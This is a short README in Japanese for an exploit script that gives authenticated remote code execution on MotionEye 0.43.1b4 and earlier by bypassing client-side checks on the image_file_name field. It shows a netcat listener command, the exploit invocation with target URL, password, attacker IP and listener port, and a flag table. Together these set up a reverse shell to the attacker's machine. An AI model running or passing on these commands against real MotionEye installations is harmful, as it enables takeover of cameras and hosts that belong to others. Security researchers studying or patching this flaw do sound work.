
MotionEye <= 0.43.1b4 における、image_file_name フィールドのクライアント側検証バイパスによる認証済み RCE。
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| フラグ | 説明 |
|---|---|
-t | ターゲットのホスト/URL(デフォルトはポート 8765) |
-u | ユーザー名(デフォルト: admin) |
-p | パスワード - GUI で入力する値と同じ / motion.conf に記載されている値 |
-lh | 攻撃者(あなた)の IP |
-lp | リスナーポート |
--camera-id | カメラ ID(省略時は自動検出) |